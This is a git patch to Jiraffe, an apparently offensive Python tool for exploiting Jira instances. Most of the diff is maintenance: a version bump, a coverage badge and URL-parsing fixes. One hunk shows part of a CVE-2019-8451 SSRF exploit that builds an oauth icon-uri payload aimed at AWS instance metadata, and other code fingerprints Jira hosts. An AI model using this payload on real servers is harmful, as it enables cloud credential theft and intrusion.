From 4d7634557e708a58ea2857fb18d1ffe4c7f74546 Mon Sep 17 00:00:00 2001
From: Piyush Raj <piyush.189303055@muj.manipal.edu>
Date: Sat, 8 May 2021 18:04:07 +0530
Subject: [PATCH] patch+bump: refactored exploits, recon-utils; generated
 code-coverage metrics

---
 .gitignore          |  3 ++-
 README.md           |  6 ++----
 assets/cov.svg      | 21 +++++++++++++++++++++
 jiraffe/__init__.py |  2 +-
 jiraffe/exploits.py |  2 +-
 jiraffe/recon.py    | 21 +++++++++++++++------
 setup.py            |  2 +-
 7 files changed, 43 insertions(+), 14 deletions(-)
 create mode 100644 assets/cov.svg

diff --git a/.gitignore b/.gitignore
index 43214f5..bf6c159 100644
--- a/.gitignore
+++ b/.gitignore
@@ -47,4 +47,5 @@ Session.vim
 .netrwhist
 *~
 
-/Jiraffe/*.bak
\ No newline at end of file
+/jiraffe/*.bak
+build-scripts
\ No newline at end of file
diff --git a/README.md b/README.md
index b61efe2..0ad8c7f 100644
--- a/README.md
+++ b/README.md
@@ -12,11 +12,9 @@
 <a href="https://github.com/0x48piraj/Jiraffe/issues?q=is%3Aissue+is%3Aclosed">
   <img src="https://img.shields.io/github/issues-closed-raw/0x48piraj/Jiraffe?color=dark-green&label=issues%20fixed">
 </a>
-<!-- 
-<a href="https://travis-ci.com/0x48piraj/Jiraffe">
-    <img src="https://img.shields.io/travis/com/0x48piraj/Jiraffe.svg?color=dark-green&label=tests">
+<a href="https://github.com/0x48piraj/Jiraffe/tree/master/tests">
+    <img src="https://raw.githubusercontent.com/0x48piraj/Jiraffe/master/assets/cov.svg">
 </a>
- -->
 
 <p align="center">
 <img alt="Jiraffe" src="https://raw.githubusercontent.com/0x48piraj/Jiraffe/master/assets/jiraffe-cover.png"><br>
diff --git a/assets/cov.svg b/assets/cov.svg
new file mode 100644
index 0000000..a9be2c5
--- /dev/null
+++ b/assets/cov.svg
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<svg xmlns="http://www.w3.org/2000/svg" width="99" height="20">
+    <linearGradient id="b" x2="0" y2="100%">
+        <stop offset="0" stop-color="#bbb" stop-opacity=".1"/>
+        <stop offset="1" stop-opacity=".1"/>
+    </linearGradient>
+    <mask id="a">
+        <rect width="99" height="20" rx="3" fill="#fff"/>
+    </mask>
+    <g mask="url(#a)">
+        <path fill="#555" d="M0 0h63v20H0z"/>
+        <path fill="#e05d44" d="M63 0h36v20H63z"/>
+        <path fill="url(#b)" d="M0 0h99v20H0z"/>
+    </g>
+    <g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="11">
+        <text x="31.5" y="15" fill="#010101" fill-opacity=".3">coverage</text>
+        <text x="31.5" y="14">coverage</text>
+        <text x="80" y="15" fill="#010101" fill-opacity=".3">29%</text>
+        <text x="80" y="14">29%</text>
+    </g>
+</svg>
diff --git a/jiraffe/__init__.py b/jiraffe/__init__.py
index 3123f1d..380481b 100644
--- a/jiraffe/__init__.py
+++ b/jiraffe/__init__.py
@@ -2,4 +2,4 @@
 # -*- coding: utf-8 -*-
 
 name = "jiraffe"
-__version__ = "2.0.5"
\ No newline at end of file
+__version__ = "2.0.6"
\ No newline at end of file
diff --git a/jiraffe/exploits.py b/jiraffe/exploits.py
index 9467101..79d099f 100644
--- a/jiraffe/exploits.py
+++ b/jiraffe/exploits.py
@@ -49,7 +49,7 @@ def cve2019_8451(target, ssrf='https://google.com'):
 	if '"rc":200' in response and res.status_code == 200 and 'set-cookie' in response:
 		print(style.GREEN("[+] Target found vulnerable to CVE-2019-8451") + style.RESET(''))
 		print(style.YELLOW("[*] Detecting target's hosting service ...") + style.RESET(''))
-		if isaws(target.split('://')[1]): # dirty but works reliably
+		if isaws(target):
 			print(style.GREEN("[+] Target is hosted on Amazon AWS") + style.RESET(''))
 			print(style.YELLOW("[*] Testing AWS SSRF payloads ...") + style.RESET(''))
 			payload = target + "/plugins/servlet/oauth/users/icon-uri?consumerUri=" + AWS_INSTANCE
diff --git a/jiraffe/recon.py b/jiraffe/recon.py
index c7493a3..697d9d8 100644
--- a/jiraffe/recon.py
+++ b/jiraffe/recon.py
@@ -10,7 +10,16 @@
 
 def uparse(target):
 	url = urlparse(target)
-	return url.scheme + "://" + url.netloc + url.path if url.path else "" # BASE URL
+	if url.path:
+		if url.path == "/":
+			print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+			return url.scheme + "://" + url.netloc + url.path
+		else:
+			return url.scheme + "://" + url.netloc + url.path
+		return 
+	else:
+		print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+		return url.scheme + "://" + url.netloc
 
 def request(target):
 	UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
@@ -18,11 +27,11 @@ def request(target):
 	try:
 		r = requests.get(target, headers=headers)
 	except Exception as e:
-		print("Problem with the HTTP request.", e, sep="\n")
+		print("[-] Problem with the HTTP request.", e, sep="\n")
 		if r.status_code != 200:
-			print("Something went wrong! (STATUS {})".format(r.status_code))
+			print("[-] Something went wrong! (STATUS {})".format(r.status_code))
 			if r.status_code == 302:
-				print("HTTP request got redirected. Set this instead: " + r.headers['Location'])
+				print("[*] HTTP request got redirected. Set this instead: " + r.headers['Location'])
 		exit(1) # https://stackoverflow.com/a/2434619
 
 	return r, r.text
@@ -37,7 +46,8 @@ def isjira(target):
 		return False
 
 def isaws(target):
-	data = socket.gethostbyaddr(target)
+	target = urlparse(target)
+	data = socket.gethostbyaddr(target.netloc)
 	if "amazonaws" in str(data):
 		return True
 	else:
@@ -48,7 +58,6 @@ def getversion(target): # ENUM #1: Jira version appears to be ____
 	f_build = '0.0.0' # default
 	vers = []
 	final_version = ""
-	target = target + urlparse(target).path if "/login.jsp" in urlparse(target).path else target + '/login.jsp'
 	res, response = request(target)
 	soup = bs4.BeautifulSoup(response, "html.parser")
 	try:
diff --git a/setup.py b/setup.py
index 4984541..8f2c931 100644
--- a/setup.py
+++ b/setup.py
@@ -15,7 +15,7 @@
 # call to setup()
 setup(
     name="jiraffe",
-    version="2.0.5",
+    version="2.0.6",
     description="One stop place for exploiting all Jira instances in your proximity.",
     long_description=README,
     long_description_content_type="text/markdown",